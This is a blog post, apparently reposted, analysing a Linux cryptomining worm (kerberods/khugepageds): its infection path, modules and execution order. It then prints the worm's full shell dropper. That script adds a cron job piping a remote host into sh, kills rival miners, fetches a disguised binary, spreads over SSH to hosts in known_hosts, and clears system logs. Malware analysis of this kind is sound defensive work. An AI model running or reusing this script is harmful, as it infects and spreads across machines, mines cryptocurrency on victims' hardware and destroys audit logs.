https://www.cnblogs.com/kobexffx/archive/2019/06/14/11000337.html
三、病毒分析
1、感染路徑
攻擊者通過網絡進入第一臺被感染的機器(redis未認證漏洞、ssh密碼暴力破解登錄等)。
第一臺感染的機器會讀取known_hosts文件,遍歷ssh登錄,如果是做了免密登錄認證,則將直接進行橫向傳播。
2、病毒主要模塊
主惡意程序:kerberods
惡意Hook庫:libcryptod.so libcryptod.c
挖礦程序:khugepageds
惡意腳本文件:netdns (用作kerberods的啟停等管理)
惡意程序:sshd (劫持sshd服務,每次登陸均可拉起病毒進程)
3、執行順序
① 執行惡意腳本下載命令
② 主進程操作
1> 添加至開機啟動,以及/etc/bashrc
2> 生成了sshd文件 劫持sshd服務
3> 將netdns文件設置為開機啟動
4> 編譯libcryptod.c為/usr/local/lib/libcryptod.so
5> 預加載動態鏈接庫,惡意hook關鍵系統操作函數
6> 修改/etc/cron.d/root文件,增加定時任務
7> 拉起khugepageds挖礦進程
附病毒惡意進程代碼
復制代碼
1 export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
2
3 mkdir -p /tmp
4 chmod 1777 /tmp
5
6 echo "* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh" | crontab -
7
8 ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
10 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
11 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
12 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
13 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
14 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
15 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
16 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
17 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
18 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
19 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
20 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
21 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
22 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
23 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
24 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
25 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
26 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
27 ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -9
28 ps -ef|grep -v grep|grep "axgtbc"|awk '{print $2}'|xargs kill -9
29 ps -ef|grep -v grep|grep "axgtfa"|awk '{print $2}'|xargs kill -9
30 ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
31 ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
32 ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
33
34 cd /tmp
35 touch /usr/local/bin/writeable && cd /usr/local/bin/
36 touch /usr/libexec/writeable && cd /usr/libexec/
37 touch /usr/bin/writeable && cd /usr/bin/
38 rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
39 export PATH=$PATH:$(pwd)
40 if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then
41 chattr -i sshd
42 rm -rf sshd
43 ARCH=$(uname -m)
44 if [ ${ARCH}x = "x86_64x" ]; then
45 (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -O sshd) && chmod +x sshd
46 else
47 (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -O sshd) && chmod +x sshd
48 fi
49 $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshd
50 fi
51
52 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
53 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done
54 fi
55
56 for file in /home/*
57 do
58 if test -d $file
59 then
60 if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
61 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done
62 fi
63 fi
64 done
65
66 echo 0>/var/spool/mail/root
67 echo 0>/var/log/wtmp
68 echo 0>/var/log/secure
69 echo 0>/var/log/cron
70 #
posted on 2019-11-13 11:33
小王 閱讀(335)
評論(0) 編輯 收藏 引用 所屬分類:
linux